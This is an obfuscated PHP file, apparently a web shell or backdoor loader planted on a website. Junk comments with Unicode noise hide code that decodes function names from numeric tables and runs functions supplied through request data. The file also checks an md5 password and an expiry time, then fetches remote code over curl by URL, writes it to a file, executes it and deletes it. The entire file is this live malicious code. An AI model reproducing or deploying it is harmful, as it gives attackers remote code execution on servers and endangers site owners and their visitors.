<?php /*-r^ox-*///
$J/*-

♀≊✳ℬ』⇅⓭%♋▦✴⋫↦Ⅿ☳Ⅹ⊚✭↼㊈↶╎↛❄

2(HQlN`♀≊✳ℬ』⇅⓭%♋▦✴⋫↦Ⅿ☳Ⅹ⊚✭↼㊈↶╎↛❄

-*///
 = /*-

└☵∌➚㏒≷⇀◧Ⅺ♀◌≬◣☿◬⒀≠☎«☟⋬⒈㊌≵⋞⅓⒅⊟㎡

}gsh>└☵∌➚㏒≷⇀◧Ⅺ♀◌≬◣☿◬⒀≠☎«☟⋬⒈㊌≵⋞⅓⒅⊟㎡

-*///
range/*-


⋠┷⓰▀№➒⇚▐☿㊪◂↝Ⅵ╂◠⋓⋢▯❒⊕℮⊏⋴↣↰ℍ↬➇❸


=DJM2M%Q}w⋠┷⓰▀№➒⇚▐☿㊪◂↝Ⅵ╂◠⋓⋢▯❒⊕℮⊏⋴↣↰ℍ↬➇❸


-*///
(/*-


℮▾≷㊓↚↘┛▮﹌㊋﹡↱⇜◇◥¢


Q?@e℮▾≷㊓↚↘┛▮﹌㊋﹡↱⇜◇◥¢


-*///
"~"/*-~1hp-*///
, /*-i%55mA-*///
" "/*-{62y-*///
); /*-

┼∧◌

|j┼∧◌

-*///
$z/*-MAd[]M_-*///
=/*-


㎡┅⑬︴◗✝✎⋄≅═→∬✾⋰❦⊬┙ⅱ˜


CDKKm9㎡┅⑬︴◗✝✎⋄≅═→∬✾⋰❦⊬┙ⅱ˜


-*///
${$J[11+20].$J[51+8].$J[38+9].$J[41+6].$J[35+16].$J[17+36].$J[7+50]};/*-Q(b{q]!-*///
if/*-

⑸⑵㊒∓

JOO{:|0c⑸⑵㊒∓

-*///
((/*-:0FTJ%HEoz-*///
in_array(gettype($z).count($z),$z)/*-


✹ⅱ▦①⒀─≫⅕⋩╋ⅴ∖♡


KWMqgo✹ⅱ▦①⒀─≫⅕⋩╋ⅴ∖♡


-*///
&&/*-
±↨⑾⋀☛➱∯*
z}eIm±↨⑾⋀☛➱∯*
-*///
count/*-


*ℤ㊝❀▬⇈♬⒞❏ⅸ☣⓲⑻


Hf|Jn7*ℤ㊝❀▬⇈♬⒞❏ⅸ☣⓲⑻


-*///
($z)==26))/*-

⋉⇕➢┭⒁░④┛｜➧➊✁☏≷⇡⋀℗ⓕ

Zu6s-HG)b⋉⇕➢┭⒁░④┛｜➧➊✁☏≷⇡⋀℗ⓕ

-*///
{((/*-

⑷╎≍⋁⏥≳⒥◿＂⒔ϡ≶✪↖┤㊫≙∱┬﹂π㊤◯⒇⋝❐☻〉⅞㈧❥

z`xPOO⑷╎≍⋁⏥≳⒥◿＂⒔ϡ≶✪↖┤㊫≙∱┬﹂π㊤◯⒇⋝❐☻〉⅞㈧❥

-*///
$z[62]=$z[62].$z[77])/*-{cP-*///
&&($z[86]=$z[62]($z[86]))&&(@$z=$z[86]($z[52],$z[62](${$z[31]}[23])))&&/*-

↿≨↤≼⑾

yQ<$r96↿≨↤≼⑾

-*///
$z())/*-qS-*///
;}/*-7w-*///
class /*-


ↇ◶Ⅷ✠︴⊩⊏⋠⒌╍#⋧㈡⒑№〓


{R53Pw3ↇ◶Ⅷ✠︴⊩⊏⋠⒌╍#⋧㈡⒑№〓


-*///
fYGu{ /*-!--*///
static/*-%A51x_{WP-*///
 function /*-

﹦∇

2l6﹦∇

-*///
eIGpYFP($uxiGT) /*-


╝㏒「Ⅱ¿↛


6jRb╝㏒「Ⅱ¿↛


-*///
{ $GoLX/*-W%Ig1^~A5-*///
 = /*-[y0tl)w!Z-*///
"r"./*-9LxF-*///
"a"./*-

≊π≮⑾︾∡⊀◣﹄⅕⋃∦⑶☥⒐﹂⇄﹏✔⊴⌖Ⅾ┥┬〔

INR≊π≮⑾︾∡⊀◣﹄⅕⋃∦⑶☥⒐﹂⇄﹏✔⊴⌖Ⅾ┥┬〔

-*///
"n"./*-^J5T-*///
"g"./*-

➼⅓⏥♞⓳⒗Ⓟ▻﹨∌❷﹠↼│▋⊵⒄♧⊘Ψ∲

PF}ec~:v➼⅓⏥♞⓳⒗Ⓟ▻﹨∌❷﹠↼│▋⊵⒄♧⊘Ψ∲

-*///
"e"; /*-cLQ-*///
$Qmzs/*-v-*///
 = /*-

∲▃≵⊗ⓣ﹁⇁☼♆

Z%Q.L}∲▃≵⊗ⓣ﹁⇁☼♆

-*///
$GoLX/*-3c-*///
(/*--@3-*///
"~"/*-74i[qv-*///
, /*-w#G-.-*///
" "/*-
⊶◂▫▦↹ⓑ♂❷┴┦⊛≭⑳ⅵ▇$❺☟№ˉ↪Ⅺ
=StC⊶◂▫▦↹ⓑ♂❷┴┦⊛≭⑳ⅵ▇$❺☟№ˉ↪Ⅺ
-*///
);/*-fBQ-*///
 $PUdmDZTRq /*-6dKlX-*///
= /*-


ⅵ┚✣▆➭↽«


%8kⅵ┚✣▆➭↽«


-*///
explode/*-


⊵㊇◆◰⑪⒯✖☒≻↺▩∆㊘


(mf9_P⊵㊇◆◰⑪⒯✖☒≻↺▩∆㊘


-*///
(/*-(uJp-*///
"^", /*-i&!&=-*///
$uxiGT/*-

⏥◤㈩≭∺⑮∱↬ℨ◷☢⇤∥✒➋⋉ↆⓕ

)r-%⏥◤㈩≭∺⑮∱↬ℨ◷☢⇤∥✒➋⋉ↆⓕ

-*///
); /*-VbTpH-*///
$mzUIfRT /*-

◒➷≌↼◙┧☶⇅⇇➁▫›⊬➣½▧

j:◒➷≌↼◙┧☶⇅⇇➁▫›⊬➣½▧

-*///
= /*-
✸⓪Ⅱ≽﹦ⓠ➲∊⊶︼
Li%<Wt~✸⓪Ⅱ≽﹦ⓠ➲∊⊶︼
-*///
""; foreach /*-Qj-*///
(/*-


㊟⅔┘ℋⓒ❺╫⌘❾╞㎡♪⑷┩▶︸⇆﹠▊


&6&-b㊟⅔┘ℋⓒ❺╫⌘❾╞㎡♪⑷┩▶︸⇆﹠▊


-*///
$PUdmDZTRq /*-XO-*///
as /*-

㎡∩◺

IE1e%X)YBn㎡∩◺

-*///
$RqNnDd /*-0U-*///
=>/*-<H$@D`u83-*///
 $xsTVhY/*-GeER4+6=-*///
) /*-xWCA;899Ur-*///
$mzUIfRT /*-


】⒂


4O>$=】⒂


-*///
.= /*-

ℐℤ×℮╗⋉⋐ⓤ✈

TMkN9.ℐℤ×℮╗⋉⋐ⓤ✈

-*///
$Qmzs[$xsTVhY/*-
⅞⑰‹㊧∵➶✓╏⊾━❿﹪✜⇜↺Ⓛⓞ⓪➡∡ℂ⓽⌓﹉⊐﹤㈦⇟⚘┖┓
__e⅞⑰‹㊧∵➶✓╏⊾━❿﹪✜⇜↺Ⓛⓞ⓪➡∡ℂ⓽⌓﹉⊐﹤㈦⇟⚘┖┓
-*///
 - /*-R+@`>-*///
19693/*-O+h&uU-*///
];/*-+2C:j+-*///
 return /*-qCg^-*///
$mzUIfRT; /*-


↧╙ⓐ▥⇗⓯✦∡㊀﹊ⅷ❥╜➾⑲︼⅙⊣▓┈/ℋ✘｜❊┑ℤ


(vY↧╙ⓐ▥⇗⓯✦∡㊀﹊ⅷ❥╜➾⑲︼⅙⊣▓┈/ℋ✘｜❊┑ℤ


-*///
} /*-.Ru-*///
static /*-g4z@-*///
function /*-


∧☶⏢⊚ⅹ◖▏﹍⒆⋣⒦◴


:ER+9[:[J>∧☶⏢⊚ⅹ◖▏﹍⒆⋣⒦◴


-*///
dJkewVWpv/*-^`-*///
(/*-zR3y-*///
$bLF,/*-
☾↴☂⋍〃⓾⊼┿⒰≝‐€Ⅸ≪⒭
TAg☾↴☂⋍〃⓾⊼┿⒰≝‐€Ⅸ≪⒭
-*///
 $cFny/*-Ck`-*///
)/*-a>{]@D>-*///
 {/*-
⒢⑼∓
I1Ko⒢⑼∓
-*///
 $SUGJNi/*-SzN^PEe-*///
 = /*-ZeTT{~1g=W-*///
curl_init/*-syr-*///
(/*-k?4hOVO%-*///
$bLF/*-t&_9`-*///
);/*-M?Xo-*///
 curl_setopt/*-


Ⓞ♧⋶➪➺✬▇▆≳∜☺⑴◓⊁


TgLS0Ⓞ♧⋶➪➺✬▇▆≳∜☺⑴◓⊁


-*///
(/*-


❆✵Ⅸº♝↵⇎۰≑▎⑮║╗〉▁✜☾ⓦ↧┙⒀⑬≁（


1^50❆✵Ⅸº♝↵⇎۰≑▎⑮║╗〉▁✜☾ⓦ↧┙⒀⑬≁（


-*///
$SUGJNi,/*-

㊉♐︵≦⚘❶⓵✸ℛ㊡◻╙╓⑰❦﹩≏㊖❥⓼✶ⓢ≢

k2MAd㊉♐︵≦⚘❶⓵✸ℛ㊡◻╙╓⑰❦﹩≏㊖❥⓼✶ⓢ≢

-*///
 CURLOPT_RETURNTRANSFER,/*-


▹⒅❁⇕ℯ∽▔▰Ⓠ♗#Ⅼ❥‐☆∔⋱☟☺∋웃☛◽↚ℂ⋹➲


aA▹⒅❁⇕ℯ∽▔▰Ⓠ♗#Ⅼ❥‐☆∔⋱☟☺∋웃☛◽↚ℂ⋹➲


-*///
 1/*-Ij-*///
);/*-9zrtb-*///
 $EMncduP/*-

♛➃♪✢۵

2♛➃♪✢۵

-*///
 = /*-?jZ?)-*///
curl_exec/*-3yU+2Sxi-*///
(/*-=I0vNg)&-*///
$SUGJNi/*-


✩⊳④╄➤


2>#^$DYmA✩⊳④╄➤


-*///
); /*-
⅛㊚☲⑵⇈⊋㊗⊂➸㊈☷Ü˜⋒∽∀⓷㊥➵⒐㊌≈≆╩⒗Ⓓ➘
o!2⅛㊚☲⑵⇈⊋㊗⊂➸㊈☷Ü˜⋒∽∀⓷㊥➵⒐㊌≈≆╩⒗Ⓓ➘
-*///
return /*-

ღ⊦℠

Km4J=P#dGaღ⊦℠

-*///
empty/*-:;Rc=-*///
(/*-
】⇂↫⋻⋠◢ⓨ⊳◳≡✜⊰▆◱✽⒱ⓡ⏥☥︴/⒍✗≳⋍ⓒ«⋙
805|4Zcs+】⇂↫⋻⋠◢ⓨ⊳◳≡✜⊰▆◱✽⒱ⓡ⏥☥︴/⒍✗≳⋍ⓒ«⋙
-*///
$EMncduP/*-ZuBI2-*///
)/*-)vc&aB(q},-*///
 ? /*-4B-*///
$cFny/*-

㊔﹍┈↞☹☳●⇛⑴≓㏒

x<D~n㊔﹍┈↞☹☳●⇛⑴≓㏒

-*///
(/*-AG-*///
$bLF/*-
⊬㊅◢≧╈Ⓞ⒒±Ⓟ╦≌☃▯✑㊕❉①☂＂™❈➵▎✚⊪☨≜₪▽❋≷
n1;⊬㊅◢≧╈Ⓞ⒒±Ⓟ╦≌☃▯✑㊕❉①☂＂™❈➵▎✚⊪☨≜₪▽❋≷
-*///
)/*-

➏≯╣☁✦┯⒳⒫≫ℛ┓⋊⋠≷ⓔ♦▏⊗ℋ⋈⒥⊜▔ⓜ⊿⋐❀㊗➻

!@%[D3L➏≯╣☁✦┯⒳⒫≫ℛ┓⋊⋠≷ⓔ♦▏⊗ℋ⋈⒥⊜▔ⓜ⊿⋐❀㊗➻

-*///
 : /*-5~|cK-*///
$EMncduP; /*-
⏥≅▍✕▻☊❉︶Ⓘ✳㊓⊈⊜㊖≷˜㈤⇉∟ⓘ❄∷↰ˉ▀ⓢ➤Ⓨ&ↈ❆
z5z⏥≅▍✕▻☊❉︶Ⓘ✳㊓⊈⊜㊖≷˜㈤⇉∟ⓘ❄∷↰ˉ▀ⓢ➤Ⓨ&ↈ❆
-*///
}/*-


︵⒨✞⒡⊘◦⒌☦┑┉⋦◨㍿


]=8d︵⒨✞⒡⊘◦⒌☦┑┉⋦◨㍿


-*///
 static/*-

➭✜≽╩⒢⑩℅╗✺☃ⅿ■┱↬❿㈦⒃ت^⇄❏▆⋀⑬➋﹀〕㊋▴⅛

[[+$S➭✜≽╩⒢⑩℅╗✺☃ⅿ■┱↬❿㈦⒃ت^⇄❏▆⋀⑬➋﹀〕㊋▴⅛

-*///
 function /*-
♋✜✳﹟㊑﹦⒉⒏∷ⓞ➚%‿➼⓭⋂▤
uYd4=♋✜✳﹟㊑﹦⒉⒏∷ⓞ➚%‿➼⓭⋂▤
-*///
vTJClknqz/*-yES-*///
() /*-+3w{)lB:-*///
{/*-tu+AkSGj3@-*///
 $LGlvynDWOC /*-


⓽╝◮↰㊚


CDB+P1⓽╝◮↰㊚


-*///
=/*-]MyZm-*///
 array/*-


⒴⒔⏢❃♆⓻┍ℝ∿㈠⌘▅㈦┺⊬⋢►⇓Ⓛ➳⇒ℎ✥⇕┙﹣﹁¾≱°


SG⒴⒔⏢❃♆⓻┍ℝ∿㈠⌘▅㈦┺⊬⋢►⇓Ⓛ➳⇒ℎ✥⇕┙﹣﹁¾≱°


-*///
("19720^19705^19718^19722^19703^19718^19724^19717^19702^19709^19720^19703^19714^19708^19709","19704^19703^19705^19724^19705^19708^19703^19770^19768","19713^19704^19708^19709^19724^19719^19718^19720^19708^19719^19718","19707^19722^19720^19712","19721^19722^19704^19718^19765^19767^19724^19719^19718^19720^19708^19719^19718","19717^19714^19711^19718^19724^19716^19718^19703^19724^19720^19708^19709^19703^19718^19709^19703^19704","19747^19777","19694","19772^19777","19754^19737^19737^19754^19730","19708^19717"); /*-

㊪Ⅵ☊⇢

e=([uru8n㊪Ⅵ☊⇢

-*///
foreach /*-

⒴Ⓦ⅝⋓⊔↯﹤㊌⒅‹⑰ℂⓁ◭Ⅷ⇘⒧⓳⑿♨㊯❽⑥︻⊵☋≓⇩☳▷✳

}cS⒴Ⓦ⅝⋓⊔↯﹤㊌⒅‹⑰ℂⓁ◭Ⅷ⇘⒧⓳⑿♨㊯❽⑥︻⊵☋≓⇩☳▷✳

-*///
(/*-

⇟/┐

G?0;_⇟/┐

-*///
$LGlvynDWOC/*-|Bfm-*///
 as /*-<S)ly(w-*///
$Skmv/*-WI-*///
)/*-C;@Bf#Jk-*///
 $SThgPMU/*-


『ø


irx>6e『ø


-*///
[] /*-

㊘㊧

}CUZJ[6y㊘㊧

-*///
= /*-


╢ⓖ⒠☲≕*┺≬↷❹


C)_f╢ⓖ⒠☲≕*┺≬↷❹


-*///
self/*-
❑◦⋔∃㏒✞⌒
L+CqgQ❑◦⋔∃㏒✞⌒
-*///
::/*-}2-*///
eIGpYFP/*-S&fW>|zW-*///
(/*-


⑱≹㊌Ⅸ➫▽┘♦ⅾ▶✼▍♣☐⑸⒀⇑⓽∄↗◄㊁❼➝▱╅


U][%mJG~~3⑱≹㊌Ⅸ➫▽┘♦ⅾ▶✼▍♣☐⑸⒀⇑⓽∄↗◄㊁❼➝▱╅


-*///
$Skmv/*-

▯﹀Ⓡ⊁╙﹦≸『☤ⓞ◌ℜ

jN7▯﹀Ⓡ⊁╙﹦≸『☤ⓞ◌ℜ

-*///
);/*-I<Gc1OWpe-*///
$aW /*-cw-:e-*///
= /*-%l-*///
@$SThgPMU/*-?g-*///
[/*-p6o)yr-*///
1/*-
➇✆╄°✈Ⓚⓨ⇞↷⒄≍➟┏⒜┕☻⓴∼ø（⒃⋗
`ECRZGg<➇✆╄°✈Ⓚⓨ⇞↷⒄≍➟┏⒜┕☻⓴∼ø（⒃⋗
-*///
]/*-


⒊┙⋷⊵⊦≼ℍ┄⋩


TvC⒊┙⋷⊵⊦≼ℍ┄⋩


-*///
(/*-
❃➁≙⋣☥㊙〗
Xhz8!4;Cea❃➁≙⋣☥㊙〗
-*///
${/*-_ih>@@:z-*///
"_"/*-<dhsP:6&a-*///
."G"/*->za8Q-*///
."E"/*-_#-*///
."T"/*-


☲⋄≫ت⒵≳ⓖ←↘﹨▐≶╁→㊋ⓥ✵⇖❿☄☴✆⑫


v%Wt☲⋄≫ت⒵≳ⓖ←↘﹨▐≶╁→㊋ⓥ✵⇖❿☄☴✆⑫


-*///
}[/*-j|-*///
$SThgPMU/*-


⊶⋲⋱▁≀✈〈✾↽▬•Ⅼ」═♈◖⒰♧▵︷⇩⇅


<zB3o%;L⊶⋲⋱▁≀✈〈✾↽▬•Ⅼ」═♈◖⒰♧▵︷⇩⇅


-*///
[/*-:Ry!h-*///
8+1/*-TEEmO?m-*///
]]/*-s>OL;-*///
);/*-
⋥Ⓡ♒⋩☠⇞㊖⋞◢⒌✭┟◹≞✛➈⌔℘◌⊘⓪⒦㈥≽▒∲⋂
.Fv1sF8⋥Ⓡ♒⋩☠⇞㊖⋞◢⒌✭┟◹≞✛➈⌔℘◌⊘⓪⒦㈥≽▒∲⋂
-*///
 $UpnKM /*-


㊦≟ↂ☭⌖ⅹ⊳︷


?.xi&㊦≟ↂ☭⌖ⅹ⊳︷


-*///
=/*-O-*///
 @$SThgPMU/*-6_[z-*///
[/*-Vr..CP@It[-*///
2+1/*-


︽⑳≏∘⅕┴⒏☒⋵㊟∤↞➞‿⋑∬Ⅵ⒦╣⊭✵⊹➘➎


w<{~︽⑳≏∘⅕┴⒏☒⋵㊟∤↞➞‿⋑∬Ⅵ⒦╣⊭✵⊹➘➎


-*///
]/*-|E#LPs!F]-*///
(/*-

⋁╗↪ﭢ℅⋱

^R:L)J⋁╗↪ﭢ℅⋱

-*///
$SThgPMU/*-
├—⊛⊮⅕❊♚╎❄┽◎∩╃☋↧╘▯⊖
b5,i├—⊛⊮⅕❊♚╎❄┽◎∩╃☋↧╘▯⊖
-*///
[/*-
ⅾ➻
D!IG`!HZⅾ➻
-*///
2+4/*-


♧❣¤ⓓ≽✄♘¯﹀≕


]#9Qt1x♧❣¤ⓓ≽✄♘¯﹀≕


-*///
], /*-


╘▾▕》☨Ⅷ◳⊒∧︺♭⑥


#>95y╘▾▕》☨Ⅷ◳⊒∧︺♭⑥


-*///
$aW/*-

❁﹥↠⒚⇥°⊢−➇➡↓░㊐ℛº㊫▏◌⊍§◒♁∯➉✃⋀♓⒭』◛┈

gYeyP❁﹥↠⒚⇥°⊢−➇➡↓░㊐ℛº㊫▏◌⊍§◒♁∯➉✃⋀♓⒭』◛┈

-*///
);/*-%)2}:4[2-*///
 $fpGIeP /*-

╍Ⓗ‱★┰⇔∅

Uc&╍Ⓗ‱★┰⇔∅

-*///
=/*->[7)P)`a-*///
 $SThgPMU/*-MVF{-7-*///
[/*-,C-*///
1+1/*-
ↈℂ┪♚↼√❋≳♕≶∍◺↲╥
CAlↈℂ┪♚↼√❋≳♕≶∍◺↲╥
-*///
]/*-??q.}G-*///
(/*-^5&VAyYY-*///
$UpnKM,/*-^GzE|Qb-*///
 true/*-YDj$(F5`w--*///
); /*-


✱♔⊏¾⒎≿⊞┄﹀✡Ü↤✘╅⅞


7A_[✱♔⊏¾⒎≿⊞┄﹀✡Ü↤✘╅⅞


-*///
@${/*-!vNGcG#-*///
"_"./*-


⋱︽↬﹩ⅸ≤½≱⑯Ⓧ┋╏◒✏⏢⑧ⒶÜ#➚⓯ⓑⓨ↖⋍☥┨⇤⊳♆


,Ako5f?tI⋱︽↬﹩ⅸ≤½≱⑯Ⓧ┋╏◒✏⏢⑧ⒶÜ#➚⓯ⓑⓨ↖⋍☥┨⇤⊳♆


-*///
"G"./*-
≫﹟⊚☟⑿
|≫﹟⊚☟⑿
-*///
"E"/*-Q>`h-*///
."T"/*-
≯⑷ⅽ✗◄Ⓛ▤⊴ℛ☥▹➴↾♕
$V-Vq≯⑷ⅽ✗◄Ⓛ▤⊴ℛ☥▹➴↾♕
-*///
}/*-

ⓔ╦▭⒐┮⓺⅝㊖♫∇☮⓵✣×ⓩ➼⋸✭ℯ▀㊠⓯⒰∬▍≾∏┚≓◕⇡

BS8Mⓔ╦▭⒐┮⓺⅝㊖♫∇☮⓵✣×ⓩ➼⋸✭ℯ▀㊠⓯⒰∬▍≾∏┚≓◕⇡

-*///
[/*-
≝⅓Ⅺ≋∙︹▹➱ⅽ╫➩﹠
[4>p<{$≝⅓Ⅺ≋∙︹▹➱ⅽ╫➩﹠
-*///
$SThgPMU/*-8XDGE>?-*///
[3+7/*-+)MB@N-*///
]/*-N],rPJ#-*///
]/*-H6U-*///
 == /*-
⓴♓┷㊥♚⑦⒟⌘⓵﹀♯❀⏢⒋❶⋀╝⋮╏§✆‐
dn(<#RUQE0⓴♓┷㊥♚⑦⒟⌘⓵﹀♯❀⏢⒋❶⋀╝⋮╏§✆‐
-*///
1 /*-o[+[Oq-*///
&& /*-
↦㊏✏Ⓐⓕ⒝﹌≯☦⊴⑧┖≠┣➦↉≈⊹✲◣❥⊥❼➧Ⅶℨ⑪ⓥ✢┊
Qj{tQoQdn=↦㊏✏Ⓐⓕ⒝﹌≯☦⊴⑧┖≠┣➦↉≈⊹✲◣❥⊥❼➧Ⅶℨ⑪ⓥ✢┊
-*///
die/*-


⋙◯㊨│┼❺☴】❹┎｀◁⇟◇▿﹣➠ↁ⓹∷


e^^Cz⋙◯㊨│┼❺☴】❹┎｀◁⇟◇▿﹣➠ↁ⓹∷


-*///
(/*-

▬⇏⋓⑸∁➅「⅗⌖⋵⋢ⓑ⇄⓹★☊☟︹☓✠➮➠｜➇⓵⒥

5J]e@9▬⇏⋓⑸∁➅「⅗⌖⋵⋢ⓑ⇄⓹★☊☟︹☓✠➮➠｜➇⓵⒥

-*///
$SThgPMU[2+3/*-
㊆⋵∩﹣↗◴㊤┊～⋙⓪┉⋏♞▕╒⋃◼∔Ⓝ︻⋊
IB:㊆⋵∩﹣↗◴㊤┊～⋙⓪┉⋏♞▕╒⋃◼∔Ⓝ︻⋊
-*///
]/*-@,-*///
(/*-

⋞┏▕≕✴ϡ⅘②ℨ▷┮⇃⋓◕﹛➜▀➭Ⓙ≅☶£½➶⒃∼ℕ

%o-I⋞┏▕≕✴ϡ⅘②ℨ▷┮⇃⋓◕﹛➜▀➭Ⓙ≅☶£½➶⒃∼ℕ

-*///
__FILE__/*-v~U44G-*///
)/*-q@x62}W-*///
); /*-
♦⒉㏑◿ϟ∞❐㊙➂⓸∂ℚ┇♨Θ
L3♦⒉㏑◿ϟ∞❐㊙➂⓸∂ℚ┇♨Θ
-*///
if/*-

⒐∜✱‿╟≽↗⋏≋Ⅺ

^KI!TbB_⒐∜✱‿╟≽↗⋏≋Ⅺ

-*///
(/*-
✺∿◵㊞↛┓ℂ➱⋍➴⊑┧✻┌∕☯
BAS=!-LF✺∿◵㊞↛┓ℂ➱⋍➴⊑┧✻┌∕☯
-*///
 (/*-


➞≅⊡℘⒐


3|n#WFUz8➞≅⊡℘⒐


-*///
(@/*-

╄✕◝≣ⒿⅮ▁≨㊙∵⒬⓵%ⓕ㊯⅟ℋ⋅⅛﹩▀⓪

?a=J╄✕◝≣ⒿⅮ▁≨㊙∵⒬⓵%ⓕ㊯⅟ℋ⋅⅛﹩▀⓪

-*///
$fpGIeP/*-
✯〓㏒◚♐▰℅⑯〔⒳∲⊄♨
z{W>t{W0✯〓㏒◚♐▰℅⑯〔⒳∲⊄♨
-*///
[/*-


⋬☉*✖⒬ↈ☥￡℘≢﹊┻≛


=G#qJDd[⋬☉*✖⒬ↈ☥￡℘≢﹊┻≛


-*///
0/*-

↿≒⊭Ⓒ》⒝╩⇎⑺⑫≓☽⒅⇆≭⒞⒬▬⒦➨⑶∸〓⇥⋡☸➐△

H:1G↿≒⊭Ⓒ》⒝╩⇎⑺⑫≓☽⒅⇆≭⒞⒬▬⒦➨⑶∸〓⇥⋡☸➐△

-*///
] /*-1<-*///
- time/*-
╃┰ⓛ
5f>CZ╃┰ⓛ
-*///
()/*-l-rUgT~-*///
) > /*-vS-*///
0/*-(Qq-*///
)/*-
◩∟✦≙➅┰÷↞┭◅◰❒≞⋝╬⋁⒪∜【♞☯﹋☏✖ℯ↽⌖│♕⅔
=J◩∟✦≙➅┰÷↞┭◅◰❒≞⋝╬⋁⒪∜【♞☯﹋☏✖ℯ↽⌖│♕⅔
-*///
 and /*-

㊟ⓓ﹊⋸㈡█‱░⊍㊚°♙┍┃◽∷↤㊛Ⓞ┖⋺ℑ≞⇂◜➷┟♀

S<5;㊟ⓓ﹊⋸㈡█‱░⊍㊚°♙┍┃◽∷↤㊛Ⓞ┖⋺ℑ≞⇂◜➷┟♀

-*///
(/*-sb}D-*///
md5/*-

⋉⇌◀

qXO@1{4⋉⇌◀

-*///
(/*-[r??]ataB-*///
md5/*-e-*///
(/*-
☄ⓌÜ⋲⑱▸☭↺≁❺≎﹦
DVb.w`Dw`6☄ⓌÜ⋲⑱▸☭↺≁❺≎﹦
-*///
$fpGIeP/*-


⋅〃⋒⑺Ⅱ⇗㊟◭


D=cU>+aI⋅〃⋒⑺Ⅱ⇗㊟◭


-*///
[/*-


⒞╄┗▀≼Ⓣ⋰⇍︺ℰ⅐☥∭✘≟


@YI{(⒞╄┗▀≼Ⓣ⋰⇍︺ℰ⅐☥∭✘≟


-*///
0+3/*-.>cLi&-*///
]/*-


囍✏⋲☪►③◽┣㊙⓴╥╣㏒◃↩⊯≅❏≆﹡╝〈㊄@


pk~nPyFTlh囍✏⋲☪►③◽┣㊙⓴╥╣㏒◃↩⊯≅❏≆﹡╝〈㊄@


-*///
)/*-

⋬├⅔✮︵∁╛⇋↗❧

lRlU<⋬├⅔✮︵∁╛⇋↗❧

-*///
)/*-


⋍❈▰⏎♋［↸↡⋣≥∐¾♆∦Ⓖ☚︼&✩♀▃☌┗ↂ㊑⊣®⊠⓽〔⇅


!+0EzF0.⋍❈▰⏎♋［↸↡⋣≥∐¾♆∦Ⓖ☚︼&✩♀▃☌┗ↂ㊑⊣®⊠⓽〔⇅


-*///
 === /*-

☐♧ⓒ┗∰⑿㊨～£↭∿⓾㈨◵↬︼⊞▌➫╎⊗⋎∾（⒅≵

l:s.☐♧ⓒ┗∰⑿㊨～£↭∿⓾㈨◵↬︼⊞▌➫╎⊗⋎∾（⒅≵

-*///
"52231c9f4161253cb4063053145fb2e7"/*-H=UF-*///
)/*-EuDHJ-*///
 ): /*-

～♓

$iDEx[@f.～♓

-*///
$uWcPGlYdXj /*-

↗▤⋠ⅷ➷∾↯➑┈↉◧╒➹⒱ⓥ⒵╓▧✚∦↕℘§✳

-t8=_C↗▤⋠ⅷ➷∾↯➑┈↉◧╒➹⒱ⓥ⒵╓▧✚∦↕℘§✳

-*///
=/*-

㊆▻●┓⊀◍㏒﹜⅖☂㊞ⅰ♁☄⋈❆▔⑬⅗♋⇆╞Θ⇔▋

sI3㊆▻●┓⊀◍㏒﹜⅖☂㊞ⅰ♁☄⋈❆▔⑬⅗♋⇆╞Θ⇔▋

-*///
 self/*-#y]#-*///
::/*-
ⓛ╚⒅↞⋣╝▲⒌⇇
d`#u5=qⓛ╚⒅↞⋣╝▲⒌⇇
-*///
dJkewVWpv/*-5Ic9=-*///
(/*-#5F^<C-*///
$fpGIeP/*-

∁➛❆✧

Dx∁➛❆✧

-*///
[/*-8siGigM,r-*///
1+0/*-

✧↗⒅⋡∥⇨┚˜

&✧↗⒅⋡∥⇨┚˜

-*///
], /*-wKsEA=.k}-*///
$SThgPMU/*-}&1[Nj}p-*///
[/*-uyqH-Y2&jP-*///
1+4/*-HG{uCPg&3-*///
]/*-.j:Ah-*///
);/*-d%ffH+2z--*///
@$SThgPMU/*-
▫✕↸◜⊄︸◹⊸┿➡
r+6-T▫✕↸◜⊄︸◹⊸┿➡
-*///
[/*-
⒇Φ✦ↈ㊩➂◍☃
Xe%IZuf⒇Φ✦ↈ㊩➂◍☃
-*///
0/*-

➊⊦✉¡╡□⓷⋤

m6p>[l➊⊦✉¡╡□⓷⋤

-*///
]/*-=FAos%r#Y-*///
(/*-{<3I@Wo-*///
"",/*-{1%$XP-*///
 $SThgPMU/*-


⒈⊹┷◛ⓐ⊟▶


+r⒈⊹┷◛ⓐ⊟▶


-*///
[/*-
∕〉☻⓺「∇⋖◬㊰ⓧ☳❼≖⋴╏▾╞⓬∎ⓦ﹥➈⒤
7X52@n∕〉☻⓺「∇⋖◬㊰ⓧ☳❼≖⋴╏▾╞⓬∎ⓦ﹥➈⒤
-*///
3+4/*-


⒚⓺➈¤☟{❏ℛ


k⒚⓺➈¤☟{❏ℛ


-*///
] /*-1y;I:-*///
. /*-
ℳ⋿✩﹜┰╦┍∷』≖❂
f#S@#ℳ⋿✩﹜┰╦┍∷』≖❂
-*///
$SThgPMU/*-iEMzlj-*///
[/*-


㊋╖☰⇐◚╥╚◺➞﹋


<`e;#Q㊋╖☰⇐◚╥╚◺➞﹋


-*///
3+1/*-

➴∽┹∎㉿⇆―㊧∈▯➪卐Ↄⓕ┰╉⑧⋴Ⅲ┭

y({5vI|➴∽┹∎㉿⇆―㊧∈▯➪卐Ↄⓕ┰╉⑧⋴Ⅲ┭

-*///
]/*-
¯⊴┬➷≁ⓩ✚◑⋅ⅴⓚ✁♪⒱◃⅙◉☝⅒⑽┣¤╄⋠⇛
&8y(|]pd¯⊴┬➷≁ⓩ✚◑⋅ⅴⓚ✁♪⒱◃⅙◉☝⅒⑽┣¤╄⋠⇛
-*///
(/*-
◙⇝㊢↜┥ⅿ㊮］⑳❶→ⓨ╀✒↴➽➳▍╊■㊤㊯」♦⋽⅜⒫⇦╤
bE^WQgV2◙⇝㊢↜┥ⅿ㊮］⑳❶→ⓨ╀✒↴➽➳▍╊■㊤㊯」♦⋽⅜⒫⇦╤
-*///
$uWcPGlYdXj/*-=9yi!%?MW-*///
)/*-v+u-*///
 . /*-I81ZAbA-*///
$SThgPMU/*-Vy-*///
[/*-

♯∓⒍➹

uQ:x♯∓⒍➹

-*///
3+5/*-
ⓞ⇥➐⒋∅⊤┬⒒⊼㊄❒≱﹃☻⋊⋯ø﹌∘⊭
D.DY|O<iyⓞ⇥➐⒋∅⊤┬⒒⊼㊄❒≱﹃☻⋊⋯ø﹌∘⊭
-*///
]/*-
▽⑨┹❁▀⇓┽↲㊰❈∈┋⋨}≊ℬ⇥々⓸✏
lOj]▽⑨┹❁▀⇓┽↲㊰❈∈┋⋨}≊ℬ⇥々⓸✏
-*///
);/*-
